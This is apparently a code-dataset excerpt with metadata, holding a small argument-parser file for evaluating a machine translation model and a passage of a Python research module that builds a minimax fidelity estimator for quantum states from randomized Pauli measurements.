| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c959a09cafe37155453fcdb077c647271d246317
| 710
|
py
|
Python
|
translation/eval_args.py
|
AkshatSh/BinarizedNMT
|
7fa15149fdfcad6b1fd0956157c3730f3dcd781f
|
[
"MIT"
] | 10
|
2019-01-19T08:15:05.000Z
|
2021-12-02T08:54:50.000Z
|
translation/eval_args.py
|
AkshatSh/BinarizedNMT
|
7fa15149fdfcad6b1fd0956157c3730f3dcd781f
|
[
"MIT"
] | null | null | null |
translation/eval_args.py
|
AkshatSh/BinarizedNMT
|
7fa15149fdfcad6b1fd0956157c3730f3dcd781f
|
[
"MIT"
] | 2
|
2019-01-25T21:19:49.000Z
|
2019-03-21T11:38:13.000Z
|
import argparse
import train_args
def get_arg_parser() -> argparse.ArgumentParser:
'''
A set of parameters for evaluation
'''
parser = train_args.get_arg_parser()
parser.add_argument('--load_path', type=str, help='the path of the model to test')
parser.add_argument('--eval_train', action='store_true', help='eval on the train set')
parser.add_argument('--eval_test', action='store_true', help='eval on the test set')
parser.add_argument('--eval_fast', action='store_true', help='eval quickly if implemented and supported (Greedy)')
parser.add_argument('--output_file', type=str, default=None, help='if specified will store the translations in this file')
return parser
| 50.714286
| 126
| 0.723944
| 103
| 710
| 4.805825
| 0.466019
| 0.090909
| 0.171717
| 0.127273
| 0.256566
| 0.113131
| 0.113131
| 0
| 0
| 0
| 0
| 0
| 0.147887
| 710
| 14
| 127
| 50.714286
| 0.818182
| 0.047887
| 0
| 0
| 0
| 0
| 0.394856
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.2
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c959fbbb426057adb9170ca9df4b29dd550126f4
| 43,792
|
py
|
Python
|
src/fidelity_estimation_pauli_sampling.py
|
akshayseshadri/minimax-fidelity-estimation
|
07ff539dc5ea8280bc4f33444da3d6a90c606833
|
[
"MIT"
] | 1
|
2021-12-16T14:23:46.000Z
|
2021-12-16T14:23:46.000Z
|
src/fidelity_estimation_pauli_sampling.py
|
akshayseshadri/minimax-fidelity-estimation
|
07ff539dc5ea8280bc4f33444da3d6a90c606833
|
[
"MIT"
] | null | null | null |
src/fidelity_estimation_pauli_sampling.py
|
akshayseshadri/minimax-fidelity-estimation
|
07ff539dc5ea8280bc4f33444da3d6a90c606833
|
[
"MIT"
] | null | null | null |
"""
Creates a fidelity estimator for any pure state, using randomized Pauli measurement strategy.
Author: Akshay Seshadri
"""
import warnings
import numpy as np
import scipy as sp
from scipy import optimize
import project_root # noqa
from src.optimization.proximal_gradient import minimize_proximal_gradient_nesterov
from src.utilities.qi_utilities import generate_random_state, generate_special_state, generate_Pauli_operator, generate_POVM, embed_hermitian_matrix_real_vector_space
from src.utilities.noise_process import depolarizing_channel
from src.utilities.quantum_measurements import Measurement_Manager
from src.fidelity_estimation import Fidelity_Estimation_Manager
def project_on_box(v, l, u):
"""
Projects the point v \in R^n on to the box C = {x \in R^n | l <= x <= u}, where the inequality x >= l and x <= u are to be interpreted
componentwise (i.e., x_k >= l_k and x_k <= u_k).
The projection of v on to the box is given as
\Pi(v)_k = l_k if v_k <= l_k
v_k if l_k <= v_k <= u_k
u_k if v_k >= u_k
Note that the above can be expressed in a compact form as \Pi(v)_k = min(max(v_k, l_k), u_k)
Here, l_k and u_k can be -\infty or \infty respectively.
"""
Pi_v = np.minimum(np.maximum(v, l), u)
return Pi_v
class Pauli_Sampler_Fidelity_Estimation_Manager():
"""
Computes the Juditsky & Nemirovski estimator and risk for pure target states when measurements
are performed as per the randomized Pauli measurement strategy described in Box II.1 of PRA submission.
In general, this involves finding a saddle point of the function
\Phi_r(sigma_1, sigma_2; phi, alpha) = Tr(rho sigma_1) - Tr(rho sigma_2)
+ \sum_{i = 1}^N alpha R_i log(\sum_{k = 1}^{N_i} exp(-phi^{i}_k/alpha) (p^{i}_1)_k)
+ \sum_{i = 1}^N alpha R_i log(\sum_{k = 1}^{N_i} exp(phi^{i}_k/alpha) (p^{i}_2)_k)
+ 2 alpha r
where
(p^{i}_1)_k = (Tr(E^(i)_k sigma_1) + \epsilon_o/Nm) / (1 + \epsilon_o) and
(p^{i}_2)_k = (Tr(E^{i}_k sigma_2) + \epsilon_o/Nm) / (1 + \epsilon_o)
are the probability distributions corresponding to the ith POVM {E^{i}_k}_{k = 1}^{N_i} with N_i elements.
R_i > 0 is a parameter that denotes the number of observations of the ith type of measurement (i.e., ith POVM).
There are a total of N POVMs.
X is the set of density matrices, rho is the "target" density matrix. r > 0 is a parameter.
Then, given the saddle point sigma_1*, sigma_2*, phi*, alpha*, we can construct an estimator
\hat{F}(\omega^{1}_1, ..., \omega^{1}_{R_1}, ... \omega^{N}_1, ..., \omega^{N}_{R_N})
= \sum_{i = 1}^N \sum_{l = 1}^{R_i} phi^{i}*(\omega^{i}_l) + c
where the constant 'c' is given by the optimization problem
c = 0.5 \max_{sigma_1} [Tr(rho sigma_1) + \sum_{i = 1}^N alpha R_i log(\sum_{k = 1}^{N_i} exp(-phi^{i}_k/alpha) (p^{i}_1)_k)]
- 0.5 \max_{sigma_2} [-Tr(rho sigma_2) + \sum_{i = 1}^N alpha R_i log(\sum_{k = 1}^{N_i} exp(phi^{i}_k/alpha) (p^{i}_2)_k)]
The saddle point value \Phi*(r) gives an upper bound for the confidence interval within which the error lies.
The above procedure described can be expensive in large dimensions. For the case of randomized Pauli measurement (RPM) strategy,
the algorithms are specialized so that very large dimensions can be handled.
For arbitrary pure target states, the RPM strategy corresponds to randomly sampling Pauli operators according to some predetermined
sampling probability, measuring these Pauli operators, and recording their outcomes (+1 or -1 eigenavalue).
For stabilizer states, this measurement strategy reduces to uniformly randomly sampling from the stabilizer group (all elements
except the identity) and measuring them.
"""
def __init__(self, n, R, NF, epsilon, epsilon_o, tol = 1e-6, random_init = False, print_progress = True):
"""
Assigns values to parameters and defines and initializes functions.
The estimator depends on the dimension of the target state, the number of repetitions of the measurement, a normalization factor,
and the confidence level.
It is independent of the actual target state used for the RPM strategy, except through the normalization factor described below.
The small parameter epsilon_o required to formalize Juditsky & Nemirovski's approach is used only in the optimization for finding alpha.
It is not used in finding the optimal sigma_1 and sigma_2 because those are computed "by hand".
Arguments:
- n : dimension of the system
- R : total number of repetitions used
- NF : the normalization factor, NF = \sum_i |tr(W_i rho)|,
where the sum is over all non-identity Paulis and rho is the target state
- epsilon : 1 - confidence level, should be between 0 and 0.25, end points excluded
- epsilon_o : constant to prevent zero probabilities in Born's rule
- tol : tolerance used by the optimization algorithms
- random_init : if True, a random initial condition is used for the optimization
- print_progress : if True, the progress of optimization is printed
"""
# confidence level
self.epsilon = epsilon
# obtain 'r' from \epsilon
self.r = np.log(2./epsilon)
# constant to keep the probabilities in Born rule positive
self.epsilon_o = epsilon_o
# dimension of the system
self.n = n
# number of repetitions of the (minimax optimal) measurement
self.R = R
# the normalization factor, NF = \sum_i |tr(W_i rho)|; state dependent
self.NF = NF
# quantities defining the POVM
self.omega1 = 0.5 * (n + NF - 1) / NF
self.omega2 = 0.5 * (NF - 1) / NF
# lower bound for the (classical) fidelity, used in the theory for optimization
self.gamma = (epsilon/2)**(2/R)
# minimum number of repetitions required for a risk less than 0.5
self.Ro = np.ceil(np.log(2/epsilon) / np.abs(np.log(np.sqrt(self.omega1 * self.omega2) + np.sqrt(np.abs((1 - self.omega1) * (1 - self.omega2))))))
# if gamma is not large enough, we have a risk of 0.5
if R <= self.Ro:
warnings.warn("The number of repetitions are very low. Consider raising the number of repetitions to at least %d." %self.Ro, MinimaxOptimizationWarning)
# tolerance for all the computations
self.tol = tol
# initialization for maximize_Phi_r_density_matrices_multiple_measurements (to be used specifically for find_alpha_saddle_point_fidelity_estimation)
if not random_init:
# we choose lambda_1 = lambda_2 = 0.9, which corresponds to sigma_1 = 0.9 rho + 0.1 rho_1_perp, sigma_2 = 0.9 rho + 0.1 rho_2_perp
self.mpdm_lambda_ds_o = np.array([0.9, 0.9])
else:
# take lambda_1 and lambda_2 as some random number between 0 and 1
self.mpdm_lambda_ds_o = np.random.random(size = 2)
# determine whether to print progress
self.print_progress = print_progress
# determine whether the optimization achieved the tolerance
self.success = True
###----- Finding x, y maximum and alpha minimum of \Phi_r
def maximize_Phi_r_alpha_density_matrices(self, alpha):
"""
Solves the optimization problem
\max_{sigma_1, sigma_2 \in X} \Phi_r_alpha(sigma_1, sigma_2)
= -\min_{sigma_1, sigma_2 \in X} -\Phi_r_alpha(sigma_1, sigma_2)
for a number alpha > 0.
The objective function is given as
Phi_r_alpha(sigma_1, sigma_2) = Tr(rho sigma_1) - Tr(rho sigma_2)
+ 2 alpha \sum_{i = 1}^N R_i log(\sum_{k = 1}^{N_i} \sqrt{(p^{i}_1)_k (p^{i}_2)_k})
where
(p^{i}_1)_k = (Tr(E^(i)_k sigma_1) + \epsilon_o/Nm) / (1 + \epsilon_o) and
(p^{i}_2)_k = (Tr(E^{i}_k sigma_2) + \epsilon_o/Nm) / (1 + \epsilon_o)
are the probability distributions corresponding to the ith POVM {E^{i}_k}_{k = 1}^{N_i} with N_i elements.
R_i > 0 is a parameter that denotes the number of observations of the ith type of measurement (i.e., ith POVM).
There are a total of N POVMs.
We parametrize the density matrices as the following convex combination
sigma_1 = lambda_1 rho + (1 - lambda_1) rho_1_perp
sigma_2 = lambda_2 rho + (1 - lambda_2) rho_2_perp
where 0 <= lambda_1, lambda_2 <= 1, and rho_1_perp and rho_2_perp are density matrices in the orthogonal complement of the target state rho.
The minimax measurement strategy consists of a single POVM with two elements {Omega, Delta_Omega}. With respect to this POVM, the Born probabilities are
Tr(Omega sigma_1) = omega_1 lambda_1 + omega_2 (1 - lambda_1)
Tr(Delta_Omega sigma_1) = (1 - omega_1) lambda_1 + (1 - omega_2) (1 - lambda_1)
and a similar expression can be written for sigma_2.
We include the parameter epsilon_o in the Born probabilities to avoid zero-division while calculating the derivative of Phi_r.
Using the above, we reduce the optimization to two dimensions, irrespective of the dimension of rho.
The optimization is performed using proximal gradient.
"""
# we work with direct sum lambda_ds = (lambda_1, lambda_2) for use in pre-written algorithms
# the objective function (we work with negative of \Phi_r_alpha so that we can minimize instead of maximize)
def f(lambda_ds):
lambda_1 = lambda_ds[0]
lambda_2 = lambda_ds[1]
# start with the terms that don't depend on POVMs
f_val = -lambda_1 + lambda_2
# number of repetitions of the POVM measurement
R = self.R
# the probability distributions corresponding to the minimax optimal POVM:
# p_1^{i}(k) = (<E^{i}_k, sigma_1> + \epsilon_o/Ni)/(1 + \epsilon_o) and
# p_2^{i}(k) = (<E^{i}_k, sigma_2> + \epsilon_o/Ni)/(1 + \epsilon_o)
p_1 = (np.array([self.omega1 * lambda_1 + self.omega2 * (1 - lambda_1), (1 - self.omega1) * lambda_1 + (1 - self.omega2) * (1 - lambda_1)]) + self.epsilon_o/2) / (1. + self.epsilon_o)
p_2 = (np.array([self.omega1 * lambda_2 + self.omega2 * (1 - lambda_2), (1 - self.omega1) * lambda_2 + (1 - self.omega2) * (1 - lambda_2)]) + self.epsilon_o/2) / (1. + self.epsilon_o)
f_val = f_val - 2*alpha * R * np.log(np.sqrt(p_1).dot(np.sqrt(p_2)))
return f_val
def gradf(lambda_ds):
lambda_1 = lambda_ds[0]
lambda_2 = lambda_ds[1]
# start with the terms that don't depend on POVMs
# gradient with respect to lambda_1
gradf_lambda_1_val = -1
# gradient with respect to lambda_2
gradf_lambda_2_val = 1
# number of repetitions of the POVM measurement
R = self.R
# the probability distributions corresponding to the POVM:
# p_1^{i}(k) = (<E^{i}_k, sigma_1> + \epsilon_o/Nm)/(1 + \epsilon_o) and
# p_2^{i}(k) = (<E^{i}_k, sigma_2> + \epsilon_o/Nm)/(1 + \epsilon_o)
p_1 = (np.array([self.omega1 * lambda_1 + self.omega2 * (1 - lambda_1), (1 - self.omega1) * lambda_1 + (1 - self.omega2) * (1 - lambda_1)]) + self.epsilon_o/2) / (1. + self.epsilon_o)
p_2 = (np.array([self.omega1 * lambda_2 + self.omega2 * (1 - lambda_2), (1 - self.omega1) * lambda_2 + (1 - self.omega2) * (1 - lambda_2)]) + self.epsilon_o/2) / (1. + self.epsilon_o)
# Hellinger affinity between p_1 and p_2
AffH = np.sqrt(p_1).dot(np.sqrt(p_2))
# gradient with respect to lambda_1
gradf_lambda_1_val = gradf_lambda_1_val - alpha * R * (self.omega1 - self.omega2) * np.sqrt(p_2/p_1).dot(np.array([1, -1]))/(AffH * (1. + self.epsilon_o))
# gradient with respect to lambda_2
gradf_lambda_2_val = gradf_lambda_2_val - alpha * R * (self.omega1 - self.omega2) * np.sqrt(p_1/p_2).dot(np.array([1, -1]))/(AffH * (1. + self.epsilon_o))
# gradient with respect to lambda_ds
gradf_val = np.array([gradf_lambda_1_val, gradf_lambda_2_val])
return gradf_val
# the other part of the objective function is an indicator function on X x X, so it is set to zero because all iterates in Nesterov's
# second method are inside the domain
P = lambda lambda_ds: 0.
# proximal operator of an indicator function is a projection
def prox_lP(lambda_ds, l, tol):
# we project each component of lambda_ds into the unit interval [0, 1]
lambda_1_projection = project_on_box(lambda_ds[0], 0, 1)
lambda_2_projection = project_on_box(lambda_ds[1], 0, 1)
lambda_ds_projection = np.array([lambda_1_projection, lambda_2_projection])
return lambda_ds_projection
# perform the minimization using Nesterov's second method (accelerated proximal gradient)
lambda_ds_opt, error = minimize_proximal_gradient_nesterov(f, P, gradf, prox_lP, self.mpdm_lambda_ds_o, tol = self.tol, return_error = True)
# check if tolerance is satisfied
if error > self.tol:
self.success = False
warnings.warn("The tolerance for the optimization was not achieved. The estimates may be unreliable. Consider using a random initial condition by setting random_init = True.", MinimaxOptimizationWarning)
# store the optimal point as initial condition for future use
self.mpdm_lambda_ds_o = lambda_ds_opt
# obtain the density matrices at the optimum
self.lambda_1_opt = lambda_ds_opt[0]
self.lambda_2_opt = lambda_ds_opt[1]
return (self.lambda_1_opt, self.lambda_2_opt, -f(lambda_ds_opt))
def find_density_matrices_alpha_saddle_point(self):
"""
Solves the optimization problem
\min_{alpha > 0} (alpha r + 0.5*inf_phi bar{Phi_r}(phi, alpha))
The function bar{\Phi_r} is given as
bar{\Phi_r}(phi, alpha) = \max_{sigma_1, sigma_2 \in X} \Phi_r(sigma_1, sigma_2; phi, alpha)
for any given vector phi \in R^{N_m} and alpha > 0.
The infinum over phi of bar{\Phi_r} can be solved to obtain
Phi_r_bar_alpha = \inf_phi bar{Phi_r}(phi, alpha)
= \max_{sigma_1, sigma_2 \in X} \inf_phi \Phi_r(sigma_1, sigma_2; phi, alpha)
= \max_{sigma_1, sigma_2 \in X} [Tr(rho sigma_1) - Tr(rho sigma_2)
+ 2 alpha \sum_{i = 1}^N R_i log(\sum_{k = 1}^{N_i} \sqrt{(p^{i}_1)_k (p^{i}_2)_k})]
where
(p^{i}_1)_k = (Tr(E^(i)_k sigma_1) + \epsilon_o/Nm) / (1 + \epsilon_o) and
(p^{i}_2)_k = (Tr(E^{i}_k sigma_2) + \epsilon_o/Nm) / (1 + \epsilon_o)
are the probability distributions corresponding to the ith POVM {E^{i}_k}_{k = 1}^{N_i} with N_i elements.
R_i > 0 is a parameter that denotes the number of observations of the ith type of measurement (i.e., ith POVM).
There are a total of N POVMs.
We define
Phi_r_alpha(sigma_1, sigma_2) = Tr(rho sigma_1) - Tr(rho sigma_2)
+ 2 alpha \sum_{i = 1}^N R_i log(\sum_{k = 1}^{N_i} \sqrt{(p^{i}_1)_k (p^{i}_2)_k})
so that
Phi_r_bar_alpha = \max_{sigma_1, sigma_2 \in X} Phi_r_alpha(sigma_1, sigma_2)
Note that Phi_r_bar_alpha >= 0 since Phi_r_alpha(sigma_1, sigma_1) = 0.
"""
# print progress, if required
if self.print_progress:
print("Beginning optimization".ljust(22), end = "\r", flush = True)
def Phi_r_bar_alpha(alpha):
Phi_r_bar_alpha_val = alpha*self.r + 0.5*self.maximize_Phi_r_alpha_density_matrices(alpha = alpha)[2]
return Phi_r_bar_alpha_val
# perform the minimization
alpha_optimization_result = sp.optimize.minimize_scalar(Phi_r_bar_alpha, bounds = (1e-16, 1e3), method = 'bounded')
# value of alpha at optimum
self.alpha_opt = alpha_optimization_result.x
# value of objective function at optimum: gives the risk
self.Phi_r_bar_alpha_opt = alpha_optimization_result.fun
# print progress, if required
if self.print_progress:
print("Optimization complete".ljust(22))
# check if alpha optimization was successful
if not alpha_optimization_result.success:
self.success = False
warnings.warn("The optimization has not converge properly to the saddle-point. The estimates may be unreliable. Consider using a random initial condition by setting random_init = True.", MinimaxOptimizationWarning)
return (self.lambda_1_opt, self.lambda_2_opt, self.alpha_opt)
###----- Finding x, y maximum and alpha minimum of \Phi_r
###----- Constructing the fidelity estimator
def find_fidelity_estimator(self):
"""
Constructs an estimator for fidelity between a pure state rho and an unknown state sigma.
First, the saddle point sigma_1*, sigma_2*, phi*, alpha* of the function
\Phi_r(sigma_1, sigma_2; phi, alpha) = Tr(rho sigma_1) - Tr(rho sigma_2)
+ \sum_{i = 1}^N alpha R_i log(\sum_{k = 1}^{N_i} exp(-phi^{i}_k/alpha) (p^{i}_1)_k)
+ \sum_{i = 1}^N alpha R_i log(\sum_{k = 1}^{N_i} exp(phi^{i}_k/alpha) (p^{i}_2)_k)
+ 2 alpha r
is found. Here,
(p^{i}_1)_k = (Tr(E^(i)_k sigma_1) + \epsilon_o/Nm) / (1 + \epsilon_o) and
(p^{i}_2)_k = (Tr(E^{i}_k sigma_2) + \epsilon_o/Nm) / (1 + \epsilon_o)
are the probability distributions corresponding to the ith POVM {E^{i}_k}_{k = 1}^{N_i} with N_i elements.
R_i > 0 is a parameter that denotes the number of observations of the ith type of measurement (i.e., ith POVM).
There are a total of N POVMs.
Then, an estimator is constructed as follows.
\hat{F}(\omega^{1}_1, ..., \omega^{1}_{R_1}, ..., \omega^{N}_1, ..., \omega^{N}_{R_N})
= \sum_{i = 1}^N \sum_{l = 1}^{R_i} phi*(\omega^{i}_l) + c
where the constant 'c' is given by the optimization problem
c = 0.5 \max_{sigma_1} [Tr(rho sigma_1) + \sum_{i = 1}^N alpha* R_i log(\sum_{k = 1}^{N_i} exp(-phi*^{i}_k/alpha*) (p^{i}_1)_k)]
- 0.5 \max_{sigma_2} [-Tr(rho sigma_2) + \sum_{i = 1}^N alpha* R_i log(\sum_{k = 1}^{N_i} exp(phi*^{i}_k/alpha*) (p^{i}_2)_k)]
We use the convention that the ith POVM outcomes are labelled as \Omega_i = {0, ..., N_m - 1}, as Python is zero-indexed.
The above is the general procedure to obtain Juditsky & Nemirovski's estimator.
For the special case of randomized Pauli measurement strategy, we simplify the above algorithms
so that we can compure the estimator for very large dimensions.
"""
# find x, y, and alpha components of the saddle point
lambda_1_opt, lambda_2_opt, alpha_opt = self.find_density_matrices_alpha_saddle_point()
# the saddle point value of \Phi_r
Phi_r_opt = self.Phi_r_bar_alpha_opt
# construct (phi/alpha)* at saddle point using lambda_1* and lambda_2*
# the probability distributions corresponding to sigma_1*, sigma_2*:
# p^{i}_1(k) = (<E^{i}_k, sigma_1*> + \epsilon_o/Ni)/(1 + \epsilon_o) and
# p^{i}_2(k) = (<E^{i}_k, sigma_2*> + \epsilon_o/Ni)/(1 + \epsilon_o)
p_1_opt = (np.array([self.omega1 * lambda_1_opt + self.omega2 * (1 - lambda_1_opt), (1 - self.omega1) * lambda_1_opt + (1 - self.omega2) * (1 - lambda_1_opt)]) + self.epsilon_o/2) / (1. + self.epsilon_o)
p_2_opt = (np.array([self.omega1 * lambda_2_opt + self.omega2 * (1 - lambda_2_opt), (1 - self.omega1) * lambda_2_opt + (1 - self.omega2) * (1 - lambda_2_opt)]) + self.epsilon_o/2) / (1. + self.epsilon_o)
# (phi/alpha)* at the saddle point
phi_alpha_opt = 0.5*np.log(p_1_opt/p_2_opt)
# obtain phi* at the saddle point
self.phi_opt = phi_alpha_opt * self.alpha_opt
# find the constant in the estimator
# c = 0.5 (Tr(rho sigma_1*) + Tr(rho sigma_2*)) = 0.5 (lambda_1* + lambda_2*)
self.c = 0.5*(lambda_1_opt + lambda_2_opt)
# build the estimator
def estimator(data):
"""
Given R independent and identically distributed elements from \Omega = {1, 2} (2 possible outcomes) sampled
as per p_{A(sigma)}, gives the estimate for the fidelity F(rho, sigma) = Tr(rho sigma).
\hat{F}(\omega_1, ..., \omega_R)
= \sum_{l = 1}^{R_i} phi^{i}*(\omega^{i}_l) + c
"""
# if a list of list is provided, following convention for Fidelity_Estimation_Manager, we obtain the list of data inside
if type(data[0]) in [list, tuple, np.ndarray]:
data = data[0]
# ensure that only data has only R elements (i.e., R repetitions), because the estimator is built for just that case
if len(data) != self.R:
raise ValueError("The estimator is built to handle only %d outcomes, while %d outcomes have been supplied." %(self.R, len(data)))
# start with the terms that don't depend on the POVMs
estimate = self.c
# build the estimate using the phi* component at the saddle point, accounting for data from the POVM
estimate = estimate + np.sum([self.phi_opt[l] for l in data])
return estimate
self.estimator = estimator
return (estimator, Phi_r_opt)
###----- Constructing the fidelity estimator
def generate_sampled_pauli_measurement_outcomes(rho, sigma, R, num_povm_list, epsilon_o, flip_outcomes = False):
"""
Generates the outcomes (index pointing to appropriate POVM element) for a Pauli sampling measurement strategy.
The strategy involves sampling the non-identity Pauli group elements, measuring them, and only using the
eigenvalue (either +1 or -1) of the measured outcome.
The sampling is done as per the probability distribution p_i = |tr(W_i rho)| / \sum_i |tr(W_i rho)|.
We represent this procedure by an effective POVM containing two elements.
If outcome eigenvalue is +1, that corresponds to index 0 of the effective POVM, while eigenvalue -1 corresponds to index 1 of the effective POVM.
If flip_outcomes is True, we measure the measure Paulis, and later flip the measurement outcomes (+1 <-> -1) as necessary. If not, we directly
measure negative of the Pauli operator.
The function requires the target state (rho) and the actual state "prepared in the lab" (sigma) as inputs.
The states (density matrices) are expected to be flattened in row-major style.
"""
# dimension of the system; rho is expected to be flattened, but this expression is agnostic to that
n = int(np.sqrt(rho.size))
# number of qubits
nq = int(np.log2(n))
if 2**nq != n:
raise ValueError("Pauli measurements possible only in systems of qubits, i.e., the dimension should be a power of 2")
# ensure that the states are flattened
rho = rho.ravel()
sigma = sigma.ravel()
# index of each Pauli of which weights need to be computed
pauli_index_list = range(1, 4**nq)
# find Tr(rho W) for each Pauli operator W (identity excluded); this is only a heuristic weight if rho is not pure
# these are not the same as Flammia & Liu weights
# computing each Pauli operator individulally (as opposed to computing a list of all Pauli operators at once) is a little slower, but can handle more number of qubits
pauli_weight_list = [np.real(np.conj(rho).dot(generate_Pauli_operator(nq = nq, index_list = pauli_index, flatten = True)[0])) for pauli_index in pauli_index_list]
# phase of each pauli operator (either +1 or -1)
pauli_phase_list = [np.sign(pauli_weight) for pauli_weight in pauli_weight_list]
# set of pauli operators along with their phases from which we will sample
pauli_measurements = list(zip(pauli_index_list, pauli_phase_list))
# probability distribution for with which the Paulis should be sampled
pauli_sample_prob = np.abs(pauli_weight_list)
# normalization factor for pauli probability
NF = np.sum(pauli_sample_prob)
# normalize the sampling probability
pauli_sample_prob = pauli_sample_prob / NF
# the effective POVM for minimax optimal strategy consists of just two POVM elements
# however, the actual measurements performed are 'R' Pauli measurements which are uniformly sampled from the pauli operators
# np.random.choice doesn't allow list of tuples directly, so indices are sampled instead
# see https://stackoverflow.com/questions/30821071/how-to-use-numpy-random-choice-in-a-list-of-tuples/55517163
uniformly_sampled_indices = np.random.choice(len(pauli_measurements), size = int(R), p = pauli_sample_prob)
pauli_to_measure_with_repetitions = [pauli_measurements[index] for index in uniformly_sampled_indices]
# unique Pauli measurements to be performed, with phase
pauli_to_measure = sorted(list(set(pauli_to_measure_with_repetitions)), key = lambda x: x[0])
# get the number of repetitions to be performed for each unique Pauli measurement (i.e., number of duplicates)
R_list, _ = np.histogram([pauli_index for (pauli_index, _) in pauli_to_measure_with_repetitions], bins = [pauli_index for (pauli_index, _) in pauli_to_measure] + [pauli_to_measure[-1][0] + 1], density = False)
# list of number of POVM elements for each (type of) measurement
# if a number is provided, a list (of integers) is created from it
if type(num_povm_list) not in [list, tuple, np.ndarray]:
num_povm_list = [int(num_povm_list)] * len(R_list)
else:
num_povm_list = [int(num_povm) for num_povm in num_povm_list]
# generate POVMs for measurement
POVM_list = [None] * len(R_list)
for (count, num_povm) in enumerate(num_povm_list):
# index of pauli opetator to measure, along with the phase
pauli, phase = pauli_to_measure[count]
if flip_outcomes:
# don't include the phase while measuring
# the phase is incorporated after the measurement outcomes are obtained
phase = 1
# generate POVM depending on whether projectors on subpace or projectors on each eigenvector is required
# note that when n = 2, subspace and eigenbasis projectors match, in which case we give precedence to eigenbasis projection
# this is because in the next block after measurements are generated, we check if num_povm is n and if that's true include phase
# but if subspace was used first, then phase would already be included and this would be the same operation twice
# so we use check for eigenbasis projection first
if num_povm == n:
# ensure that the supplied Pauli operator is a string composed of 0, 1, 2, 3
if type(pauli) in [int, np.int64]:
if pauli > 4**nq - 1:
raise ValueError("Each pauli must be a number between 0 and 4^{nq} - 1")
# make sure pauli is a string
pauli = np.base_repr(pauli, base = 4)
# pad pauli with 0s on the left so that the total string is of size nq (as we need a Pauli operator acting on nq qubits)
pauli = pauli.rjust(nq, '0')
elif type(pauli) == str:
# get the corresponding integer
pauli_num = np.array(list(pauli), dtype = 'int')
pauli_num = pauli_num.dot(4**np.arange(len(pauli) - 1, -1, -1))
if pauli_num > 4**nq - 1:
raise ValueError("Each pauli must be a number between 0 and 4^{nq} - 1")
# pad pauli with 0s on the left so that the total string is of size nq (as we need a Pauli operator acting on nq qubits)
pauli = pauli.rjust(nq, '0')
# we take POVM elements as rank 1 projectors on to the (orthonormal) eigenbasis of the Pauli operator specified by 'pauli' string
# - first create the computation basis POVM and then use the Pauli operator strings to get the POVM in the respective Pauli basis
computational_basis_POVM = generate_POVM(n = n, num_povm = n, projective = True, pauli = None, flatten = False, isComplex = True, verify = False)
# - to get Pauli X basis, we can rotate the computational basis using Hadamard
# - to get Pauli Y basis, we can rotate the computational basis using a matrix similar to Hadamard
# use a dictionary to make these mappings
comp_basis_transform_dict = {'0': np.eye(2, dtype = 'complex128'), '1': np.array([[1., 1.], [1., -1.]], dtype = 'complex128')/np.sqrt(2),\
'2': np.array([[1., 1.], [1.j, -1.j]], dtype = 'complex128')/np.sqrt(2), '3': np.eye(2, dtype = 'complex128')}
transform_matrix = np.eye(1)
# pauli contains tensor product of nq 1-qubit Pauli operators, so parse through them to get a unitary mapping computational basis to Pauli eigenbasis
for ithpauli in pauli:
transform_matrix = np.kron(transform_matrix, comp_basis_transform_dict[ithpauli])
# create the POVM by transforming the computational basis to given Pauli basis
# the phase doesn't matter when projecting on to the eigenbasis; the eigenvalues are +1, -1 or +i, -i, depending on the phase but we can infer that upon measurement
POVM = [transform_matrix.dot(Ei).dot(np.conj(transform_matrix.T)).ravel() for Ei in computational_basis_POVM]
elif num_povm == 2:
# the Pauli operator that needs to be measured
Pauli_operator = phase * generate_Pauli_operator(nq, pauli)[0]
# if W is the Pauli operator and P_+ and P_- are projectors on to the eigenspaces corresponding to +1 (+i) & -1 (-i) eigenvalues, then
# l P_+ - l P_- = W, and P_+ + P_- = \id. We can solve for P_+ and P_- from this. l \in {1, i}, depending on the pase.
# l = 1 or i can be obtained from the phase as sgn(phase) * phase, noting that phase is one of +1, -1, +i or -i
P_plus = 0.5*(np.eye(n, dtype = 'complex128') + Pauli_operator / (phase * np.sign(phase)))
P_minus = 0.5*(np.eye(n, dtype = 'complex128') - Pauli_operator / (phase * np.sign(phase)))
POVM = [P_plus.ravel(), P_minus.ravel()]
else:
raise ValueError("Pauli measurements with only 2 or 'n' POVM elements are supported")
# store the POVM for measurement
POVM_list[count] = POVM
# initiate the measurements
measurement_manager = Measurement_Manager(random_seed = None)
measurement_manager.n = n
measurement_manager.N = len(POVM_list)
measurement_manager.POVM_mat_list = [np.vstack(POVM) for POVM in POVM_list]
measurement_manager.N_list = [len(POVM) for POVM in POVM_list]
# perform the measurements
data_list = measurement_manager.perform_measurements(sigma, R_list, epsilon_o, num_sets_outcomes = 1, return_outcomes = True)[0]
# convert the outcomes of the Pauli measurements to those of the effective POVM
effective_outcomes = list()
for (count, data) in enumerate(data_list):
num_povm = num_povm_list[count]
pauli_index, phase = pauli_to_measure[count]
if flip_outcomes:
# store the actual phase for later use
actual_phase = int(phase)
# Pauli were measured without the phase, so do the conversion of outcomes to those of effective POVM with that in mind
phase = 1
# for num_povm = 2, there is nothing to do because outcome '0' corresponds to +1 eigenvalue and outcome 1 corresponds to -1 eigenvalue
# if flip_outcomes is False, then these are also the outcomes for the effective POVM because phase was already accounted for during measurement
# if flip_outcomes is True, then we will later flip the outcome index (0 <-> 1) to account for the phase
# for num_povm = n, we need to figure out the eigenvalue corresponding to outcome (an index from 0 to n - 1, pointing to the basis element)
# we map +1 value to 0 and -1 eigenvalue to 1, which corresponds to the respective indices of elements in the effective POVM
if num_povm == n:
# all Paulis have eigenvalues 1, -1, but we are doing projective measurements onto the eigenbasis of Pauli operators
# so, half of them will have +1 eigenvalue, the other half will have -1 eigenvalue
# we are mapping the computational basis to the eigenbasis of the Pauli operator to perform the measurement
# 0 for the ith qubit goes to the +1 eigenvalue eigenstate of the ith Pauli, and
# 1 for the ith qubit goes to the -1 eigenvalue eigenstate of the ith Pauli
# the exception is when the ith Pauli is identity, where the eigenstate is as described above but eigenvalue is always +1
